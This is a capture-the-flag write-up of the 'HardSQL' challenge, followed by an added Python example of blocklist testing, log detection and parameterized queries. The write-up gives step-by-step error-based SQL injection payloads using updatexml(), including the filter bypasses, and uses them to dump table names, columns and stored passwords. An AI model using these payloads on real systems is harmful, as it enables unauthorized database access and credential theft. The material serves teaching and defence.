[Geek Challenge 2019] HardSQL
[Target]
Sql injection
[Environment]
Buuctf
[Tools]
Browser
[Analysis]
1. Entering numbers or letters: every input shows the following result.
2. Try the universal password: a different message is displayed.
3. Try the query bar: both methods show the same message.
Double writing is also filtered out, and spaces, =, and union are filtered as well.
4. We try error-based injection. There are two functions for error-based injection; here we use updatexml(a,b,c). This function's a and c must be of string type, so making a or c a non-string value makes it report an error.
Payload:
username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1
The database name is displayed.
Next, find the tables.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1
Next, query the columns.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=1
We get id, username, password; continue to query the values.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=1
I found that the flag was not fully displayed.
After some searching, I learned that the right() function can be used to fetch the rest:
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=1
Splicing the two halves together gives the flag.
New knowledge from this flag: left() and right() can be used when the output is not shown completely.
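The write-up shows why a keyword blocklist (spaces, `=`, `union`) does not stop injection: parentheses replace whitespace and `like` replaces `=`, and the `0x7e` (`~`) in the XPath argument of `updatexml()` makes MySQL echo the expression in its "XPATH syntax error" message (which is why the output is cut off; that message shows at most 32 characters, hence the `right(password,25)` trick). The following Python example is added here and is not part of the original write-up or of the challenge; it shows the defender's side of the same material: a mock of the challenge's blocklist that the page's own payload passes, a log-line detector for the `updatexml`/`extractvalue` + `0x7e` signature, and a parameterized query in which the same payload is treated as plain data. The table and column names, the log lines and the stored flag value are constructed for the demo; the `users` table and the `check.php` path are assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Mock of the challenge's blocklist as the write-up describes it:
# spaces, '=' and 'union' are rejected (assumption: case-insensitive).
BLOCKED_TOKENS = (" ", "=", "union")


def is_blocked(value: str) -> bool:
    """True if the input contains any blocklisted token."""
    lowered = value.lower()
    return any(tok in lowered for tok in BLOCKED_TOKENS)


# The write-up's first payload: it contains no space, no '=' and no
# 'union', so the blocklist lets it through unchanged.
PAGE_PAYLOAD = "1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#"


def unsafe_query(username: str, password: str) -> str:
    """String-built query of the kind the challenge runs (shown, not executed)."""
    return (
        "SELECT id, username FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )


# Detection: updatexml()/extractvalue() wrapping an expression that carries
# the 0x7e / '~' marker used to force the XPath error.
ERROR_BASED_RE = re.compile(
    r"(updatexml|extractvalue)\s*\(.*?(0x7e|~)", re.IGNORECASE | re.DOTALL
)


def detect_error_based_sqli(log_line: str) -> bool:
    """Scan one URL-encoded access-log line for the error-based pattern."""
    decoded = unquote_plus(log_line)
    return bool(ERROR_BASED_RE.search(decoded))


# Constructed access-log lines: one carrying the write-up's URL-encoded
# payload, one normal login.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:12:00:00 +0000] "POST /check.php?'
    'username=1%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23'
    '&password=1 HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2020:12:00:01 +0000] "POST /check.php?'
    'username=alice&password=hunter2 HTTP/1.1" 200 512',
]


def build_demo_db() -> sqlite3.Connection:
    """In-memory table with a constructed sample row (not the real challenge data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'flag', 'flag{constructed_sample}')")
    conn.commit()
    return conn


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized lookup: the driver binds the values, so quotes and
    function calls in the input never become part of the SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    print("blocklist stops payload:", is_blocked(PAGE_PAYLOAD))
    print("query as built by string concat:", unsafe_query(PAGE_PAYLOAD, "1"))
    for line in SAMPLE_LOG:
        print("flagged" if detect_error_based_sqli(line) else "clean  ", line[:60])
    conn = build_demo_db()
    print("parameterized login with payload:", safe_login(conn, PAGE_PAYLOAD, "1"))
```

`is_blocked` returns `False` for the page's payload, which is the whole point of the write-up: a blocklist checks for tokens the attacker simply does not need. `safe_login` returns `None` for the same input because the placeholder binds it as a string value. The detector decodes the request line before matching, since the payload arrives percent-encoded (`%27`, `%23`) in the log.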